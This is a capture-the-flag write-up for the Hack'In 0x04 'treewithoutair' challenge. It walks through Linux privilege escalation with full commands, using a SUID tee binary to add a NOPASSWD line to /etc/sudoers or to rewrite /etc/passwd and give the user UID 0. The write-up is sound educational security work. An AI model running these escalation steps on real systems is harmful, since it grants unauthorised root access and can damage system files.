../treewithoutair

/Cybersecurity/ /Hack'In 0x04/ /PrivEsc/

HN0x04 | 🩸 treewithoutair

This challenge is a part of the Hack’In 0x04 CTF.

Goal

Read the flag in /flag.txt (need to be root).

Walkthrough

We need to privesc somehow, let’s start with basics: sudo permissions.

lolo@32c81f5d612d:~$ sudo -l
[sudo] password for lolo:
Sorry, user lolo may not run sudo on 32c81f5d612d.

No luck here… Let’s try to find suid binaries:

lolo@32c81f5d612d:~$ find / -type f -perm /u=s 2>/dev/null
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/su
/usr/bin/chfn
/usr/bin/mount
/usr/bin/tee
/usr/bin/gpasswd
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign

Fancy, we can see that tee can be run as root (that’s what the “tree without air” is about, nice pun). This is really good because tee allows to write files!

Being able to write files means that we can trivially privesc:

lolo@32c81f5d612d:~$ echo 'lolo ALL=(ALL) NOPASSWD: ALL' | tee -a /etc/sudoers
lolo ALL=(ALL) NOPASSWD: ALL
lolo@32c81f5d612d:~$ sudo -l
User lolo may run the following commands on 32c81f5d612d:
    (ALL) NOPASSWD: ALL

We simply added ourself in the sudoers file, allowing us to run any command as any user without any password.

Let’s finish this:

lolo@32c81f5d612d:~$ sudo su -
root@32c81f5d612d:~# cat /flag.txt
HNx04{...}

Alternate solution (without using sudo)

In case we don’t want to use sudo for that (or we find ourself in a situation where sudo is not available), here is what we can do instead:

lolo@391bf4fd4adf:~$ sed 's|^lolo.*|lolo:x:0:0:root:/root:/bin/bash|' /etc/passwd > /tmp/passwd
; cat /tmp/passwd | tee /etc/passwd
root:x:0:0:root:/root:/bin/bash
[...]
lolo:x:0:0:root:/root:/bin/bash

We can make ourself root by simply changing our UID/GID in the /etc/passwd file.

/!\ Be careful not to pipe the sed command directly into tee, otherwise bash would read and write to the same file concurrently, resulting in your /etc/passwd being empty…

We are not immediately root because the /etc/passwd file has not been re-read:

lolo@391bf4fd4adf:~$ id
uid=1000 gid=996(lolo) groups=996(lolo),27(sudo)

However, if we simply re-open a session, we are directly root!

lolo@391bf4fd4adf:~$ su - lolo
Password:
root@391bf4fd4adf:~# id
uid=0(root) gid=0(root) groups=0(root),27(sudo)